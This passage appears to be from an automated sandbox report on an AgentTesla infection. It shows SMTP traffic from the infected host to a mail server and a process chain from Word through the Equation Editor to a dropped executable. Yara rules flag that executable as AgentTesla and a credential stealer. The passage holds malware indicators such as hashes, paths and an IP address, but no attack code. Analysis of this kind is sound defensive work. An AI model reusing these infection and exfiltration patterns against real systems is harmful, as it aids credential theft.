                                                                          Jan 27, 2021 19:07:18.673263073 CET49173587192.168.2.22198.54.122.60STARTTLS
                                                                          Jan 27, 2021 19:07:18.877574921 CET58749173198.54.122.60192.168.2.22220 Ready to start TLS
                                                                          Jan 27, 2021 19:07:26.973927021 CET58749174198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                          Jan 27, 2021 19:07:26.974147081 CET49174587192.168.2.22198.54.122.60EHLO 287400
                                                                          Jan 27, 2021 19:07:27.178853989 CET58749174198.54.122.60192.168.2.22250-MTA-10.privateemail.com
                                                                          250-PIPELINING
                                                                          250-SIZE 81788928
                                                                          250-ETRN
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250 STARTTLS
                                                                          Jan 27, 2021 19:07:27.179207087 CET49174587192.168.2.22198.54.122.60STARTTLS
                                                                          Jan 27, 2021 19:07:27.387157917 CET58749174198.54.122.60192.168.2.22220 Ready to start TLS

                                                                          Code Manipulations

                                                                          Statistics

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Start time:19:05:36
                                                                          Start date:27/01/2021
                                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                          Imagebase:0x13fa70000
                                                                          File size:1424032 bytes
                                                                          MD5 hash:95C38D04597050285A18F66039EDB456
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:19:05:37
                                                                          Start date:27/01/2021
                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                          Imagebase:0x400000
                                                                          File size:543304 bytes
                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:19:05:41
                                                                          Start date:27/01/2021
                                                                          Path:C:\Users\user\AppData\Roaming\RegAskcfcd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Roaming\RegAskcfcd.exe
                                                                          Imagebase:0xd40000
                                                                          File size:76288 bytes
                                                                          MD5 hash:F82A16AC433034D92B1F2A4023DF6D6B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2110262554.00000000036FE000.00000004.00000001.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          General

                                                                          Start time:19:05:48
                                                                          Start date:27/01/2021
                                                                          Path:C:\Users\user\AppData\Roaming\RegAskcfcd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Roaming\RegAskcfcd.exe
                                                                          Imagebase:0xd40000
                                                                          File size:76288 bytes
                                                                          MD5 hash:F82A16AC433034D92B1F2A4023DF6D6B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2362272923.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2363266312.00000000025F9000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2363266312.00000000025F9000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2362764617.0000000002161000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2362764617.0000000002161000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2362877479.000000000222B000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2362877479.000000000222B000.00000004.00000001.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Reset < >